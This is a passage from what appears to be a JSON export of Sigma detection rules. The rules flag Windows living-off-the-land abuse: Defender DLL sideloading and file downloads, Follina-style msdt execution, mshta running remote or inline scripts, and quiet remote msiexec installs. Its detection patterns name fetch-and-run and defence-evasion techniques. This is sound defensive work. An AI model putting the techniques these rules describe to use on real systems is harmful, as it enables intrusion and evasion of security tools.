    "content": "title: Potential Mpclient.DLL Sideloading Via Defender Binaries\nid: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9\nrelated:\n    - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc\n      type: similar\nstatus: test\ndescription: Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-01\nmodified: 2023-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    filter_main_known_locations:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml",
    "content": "title: File Download Via Windows Defender MpCmpRun.EXE\nid: 46123129-1024-423e-9fae-43af4a0fa9a5\nstatus: test\ndescription: Detects the use of Windows Defender MpCmdRun.EXE to download files\nreferences:\n    - https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866\n    - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\nauthor: Matthew Matchen\ndate: 2020-09-04\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'MpCmdRun.exe'\n        - Image|endswith: '\\MpCmdRun.exe'\n        - CommandLine|contains: 'MpCmdRun.exe'\n        - Description: 'Microsoft Malware Protection Command Line Utility'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'DownloadFile'\n            - 'url'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml",
    "content": "title: Windows Defender Definition Files Removed\nid: 9719a8aa-401c-41af-8108-ced7ec9cd75c\nstatus: test\ndescription: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\nauthor: frack113\ndate: 2021-07-07\nmodified: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MpCmdRun.exe'\n        - OriginalFileName: MpCmdRun.exe\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -RemoveDefinitions'\n            - ' -All'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml",
    "content": "title: Suspicious Msbuild Execution By Uncommon Parent Process\nid: 33be4333-2c6b-44f4-ae28-102cdbde0a31\nstatus: test\ndescription: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process\nreferences:\n    - https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/\n    - https://www.echotrail.io/insights/search/msbuild.exe\nauthor: frack113\ndate: 2022-11-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\MSBuild.exe'\n        - OriginalFileName: 'MSBuild.exe'\n    filter_parent:\n        ParentImage|endswith:\n            - '\\devenv.exe'\n            - '\\cmd.exe'\n            - '\\msbuild.exe'\n            - '\\python.exe'\n            - '\\explorer.exe'\n            - '\\nuget.exe'\n    condition: selection and not filter_parent\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_answer_file_exec.yml",
    "content": "title: MSDT Execution Via Answer File\nid: 9c8c7000-3065-44a8-a555-79bcba5d9955\nstatus: test\ndescription: |\n    Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab).\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-13\nmodified: 2025-10-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        CommandLine|contains: '\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml'\n        CommandLine|contains|windash: ' -af '\n    filter_main_pcwrun:\n        ParentImage|endswith: '\\pcwrun.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Possible undocumented parents of \"msdt\" other than \"pcwrun\".\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml",
    "content": "title: Potential Arbitrary Command Execution Using Msdt.EXE\nid: 258fc8ce-8352-443a-9120-8a11e4857fa5\nstatus: test\ndescription: Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\n    - https://twitter.com/_JohnHammond/status/1531672601067675648\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-29\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd_inline:\n        CommandLine|contains: 'IT_BrowseForFile='\n    selection_cmd_answerfile_flag:\n        CommandLine|contains: ' PCWDiagnostic'\n    selection_cmd_answerfile_param:\n        CommandLine|contains|windash: ' -af '\n    condition: selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml",
    "content": "title: Suspicious Cabinet File Execution Via Msdt.EXE\nid: dc4576d4-7467-424f-9eee-fd2b02855fe0\nrelated:\n    - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3\n      type: obsolete\nstatus: test\ndescription: Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190\nreferences:\n    - https://twitter.com/nas_bench/status/1537896324837781506\n    - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\nauthor: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113\ndate: 2022-06-21\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd:\n        CommandLine|contains|windash: ' -cab '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of \".diagcab\" files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml",
    "content": "title: Suspicious MSDT Parent Process\nid: 7a74da6b-ea76-47db-92cc-874ad90df734\nstatus: test\ndescription: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\nauthor: Nextron Systems\ndate: 2022-06-01\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50\n    selection_msdt:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml",
    "content": "title: Arbitrary File Download Via MSEDGE_PROXY.EXE\nid: e84d89c4-f544-41ca-a6af-4b92fd38b023\nstatus: test\ndescription: Detects usage of \"msedge_proxy.exe\" to download arbitrary files\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msedge_proxy.exe'\n        - OriginalFileName: 'msedge_proxy.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_http.yml",
    "content": "title: Remotely Hosted HTA File Executed Via Mshta.EXE\nid: b98d0db6-511d-45de-ad02-e82a98729620\nstatus: test\ndescription: Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-08\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - 'ftp://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml",
    "content": "title: Wscript Shell Run In CommandLine\nid: 2c28c248-7f50-417a-9186-a85b223010ee\nstatus: test\ndescription: Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity\nreferences:\n    - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html\n    - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\nmodified: 2023-05-15\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Wscript.'\n            - '.Shell'\n            - '.Run'\n    condition: selection\nfalsepositives:\n    - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_javascript.yml",
    "content": "title: Suspicious JavaScript Execution Via Mshta.EXE\nid: 67f113fa-e23d-4271-befa-30113b3e08b1\nstatus: test\ndescription: Detects execution of javascript code using \"mshta.exe\".\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2023-02-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_cli:\n        CommandLine|contains: 'javascript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml",
    "content": "title: Potential LethalHTA Technique Execution\nid: ed5d72a6-f8f4-479d-ba79-02f6a80d7471\nstatus: test\ndescription: Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process\nreferences:\n    - https://codewhitesec.blogspot.com/2018/07/lethalhta.html\nauthor: Markus Neis\ndate: 2018-06-07\nmodified: 2023-02-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\mshta.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml",
    "content": "title: Suspicious MSHTA Child Process\nid: 03cc0c25-389f-4bf8-b48d-11878079f1ca\nstatus: test\ndescription: Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution\nreferences:\n    - https://www.trustedsec.com/july-2015/malicious-htas/\nauthor: Michael Haag\ndate: 2019-01-16\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\n    - car.2013-02-003\n    - car.2013-03-001\n    - car.2014-04-003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\mshta.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n              - '\\sh.exe'\n              - '\\bash.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n              - '\\bitsadmin.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wscript.exe'\n              - 'cscript.exe'\n              - 'Bash.exe'\n              - 'reg.exe'\n              - 'REGSVR32.EXE'\n              - 'bitsadmin.exe'\n    condition: all of selection*\nfalsepositives:\n    - Printer software / driver installations\n    - HP software\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml",
    "content": "title: MSHTA Execution with Suspicious File Extensions\nid: cc7abbd0-762b-41e3-8a26-57ad50d2eea3\nstatus: test\ndescription: |\n    Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,\n    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications\n    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and\n    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.\nreferences:\n    - http://blog.sevagas.com/?Hacking-around-HTA-files\n    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356\n    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script\n    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997\n    - https://twitter.com/mattifestation/status/1326228491302563846\n    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c\nauthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2019-02-22\nmodified: 2025-05-12\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.t1218.005\n    - attack.execution\n    - attack.t1059.007\n    - cve.2020-1599\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'mshta.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '.7z'\n            - '.avi'\n            - '.bat'\n            - '.bmp'\n            - '.conf'\n            - '.csv'\n            - '.dll'\n            - '.doc'\n            - '.gif'\n            - '.gz'\n            - '.ini'\n            - '.jpe'\n            - '.jpg'\n            - '.json'\n            - '.lnk'\n            - '.log'\n            - '.mkv'\n            - '.mp3'\n            - '.mp4'\n            - '.pdf'\n            - '.png'\n            - '.ppt'\n            - '.rar'\n            - '.rtf'\n            - '.svg'\n            - '.tar'\n            - '.tmp'\n            - '.txt'\n            - '.xls'\n            - '.xml'\n            - '.yaml'\n            - '.yml'\n            - '.zip'\n            - 'vbscript'\n            # - '.chm'  # could be prone to false positives\n            # - '.exe'\n    condition: all of selection_*\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml",
    "content": "title: Suspicious Mshta.EXE Execution Patterns\nid: e32f92d1-523e-49c3-9374-bdb13b46a3ba\nstatus: test\ndescription: Detects suspicious mshta process execution patterns\nreferences:\n    - https://en.wikipedia.org/wiki/HTML_Application\n    - https://www.echotrail.io/insights/search/mshta.exe\n    - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-17\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_susp:\n        # Suspicious parents\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n        # Suspicious folders\n        CommandLine|contains:\n            - '\\AppData\\Local\\'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Users\\Public\\'\n            - 'C:\\Windows\\Temp\\'\n    filter_img:\n        # Filter legit Locations\n        - Image|startswith:\n              - 'C:\\Windows\\System32\\'\n              - 'C:\\Windows\\SysWOW64\\'\n        # Suspicious extensions\n        - CommandLine|contains:\n              - '.htm'\n              - '.hta'\n        # Filter simple execution\n        - CommandLine|endswith:\n              - 'mshta.exe'\n              - 'mshta'\n    condition: all of selection_* or (selection_img and not filter_img)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_dll.yml",
    "content": "title: DllUnregisterServer Function Call Via Msiexec.EXE\nid: 84f52741-8834-4a8c-a413-2eb2269aa6c8\nstatus: test\ndescription: Detects MsiExec loading a DLL and calling its DllUnregisterServer function\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\n    - https://twitter.com/_st0pp3r_/status/1583914515996897281\nauthor: frack113\ndate: 2022-04-24\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: '\\msiexec.exe'\n    selection_flag:\n        CommandLine|contains|windash: ' -z '\n    selection_dll:\n        CommandLine|contains: '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml",
    "content": "title: Suspicious MsiExec Embedding Parent\nid: 4a2a2c3e-209f-4d01-b513-4155a540b469\nstatus: test\ndescription: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nauthor: frack113\ndate: 2022-04-16\nmodified: 2022-07-14\ntags:\n    - attack.t1218.007\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n        ParentCommandLine|contains|all:\n            - 'MsiExec.exe'\n            - '-Embedding '\n    filter_splunk_ufw:\n        Image|endswith: ':\\Windows\\System32\\cmd.exe'\n        CommandLine|contains: 'C:\\Program Files\\SplunkUniversalForwarder\\bin\\'\n    filter_vs:\n        - CommandLine|contains: '\\DismFoDInstall.cmd'\n        - ParentCommandLine|contains|all:\n              - '\\MsiExec.exe -Embedding '\n              - 'Global\\MSI0000'\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml",
    "content": "title: Suspicious Msiexec Execute Arbitrary DLL\nid: 6f4191bb-912b-48a8-9ce7-682769541e6d\nstatus: test\ndescription: |\n    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://twitter.com/_st0pp3r_/status/1583914515996897281\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msiexec.exe'\n        CommandLine|contains|windash: ' -y'\n    filter_apple:\n        CommandLine|contains:\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll'\n            - '\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\'\n            - '\\MsiExec.exe\" /Y C:\\Windows\\CCM\\' # also need non-quoted execution\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll'\n            - '\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\'\n            - '\\MsiExec.exe\" -Y C:\\Windows\\CCM\\' # also need non-quoted execution\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml",
    "content": "title: Msiexec Quiet Installation\nid: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5\nstatus: test\ndescription: |\n    Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\n    Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\n    - https://twitter.com/_st0pp3r_/status/1583914244344799235\nauthor: frack113\ndate: 2022-01-16\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    selection_cli:\n        # Note that there is no space before and after the arguments because it's possible to write a commandline as such\n        # Example: msiexec -q/i [MSI Package]\n        CommandLine|contains|windash:\n            - '-i'\n            - '-package'\n            - '-a'\n            - '-j'\n    selection_quiet:\n        CommandLine|contains|windash: '-q'\n    filter_user_temp:\n        # The %temp% is a very common location for installers\n        ParentImage|startswith: 'C:\\Users\\'\n        ParentImage|contains: '\\AppData\\Local\\Temp\\'\n    filter_system_temp:\n        ParentImage|startswith: 'C:\\Windows\\Temp\\'\n    filter_ccm:\n        ParentImage: 'C:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - WindowsApps installing updates via the quiet flag\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml",
    "content": "title: Suspicious Msiexec Quiet Install From Remote Location\nid: 8150732a-0c9d-4a99-82b9-9efb9b90c40c\nrelated:\n    - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f\n      type: similar\nstatus: test\ndescription: Detects usage of Msiexec.exe to install packages hosted remotely quietly\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-28\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: 'msiexec.exe'\n    selection_cli:\n        # Note that there is no space before and after the arguments because it's possible to write a commandline as such\n        # Example: msiexec -q/i [MSI Package]\n        CommandLine|contains|windash:\n            - '-i'\n            - '-package'\n            - '-a'\n            - '-j'\n    selection_quiet:\n        CommandLine|contains|windash: '-q'\n    selection_remote:\n        CommandLine|contains:\n            - 'http'\n            - '\\\\\\\\'\n    filter_optional_openoffice:\n        CommandLine|contains|all:\n            - '\\AppData\\Local\\Temp\\OpenOffice'\n            - 'Installation Files\\openoffice'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml",
    "content": "title: Potential MsiExec Masquerading\nid: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144\nstatus: test\ndescription: Detects the execution of msiexec.exe from an uncommon directory\nreferences:\n    - https://twitter.com/200_okay_/status/1194765831911215104\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-11-14\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\msiexec.exe'\n        - OriginalFileName: '\\msiexec.exe'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml",
    "content": "title: MsiExec Web Install\nid: f7b5f842-a6af-4da5-9e95-e32478f3cd2f\nrelated:\n    - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c\n      type: similar\nstatus: test\ndescription: Detects suspicious msiexec process starts with web addresses as parameter\nreferences:\n    - https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-02-09\nmodified: 2022-01-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.007\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' msiexec'\n            - '://'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msix_ai_stub_execution.yml",
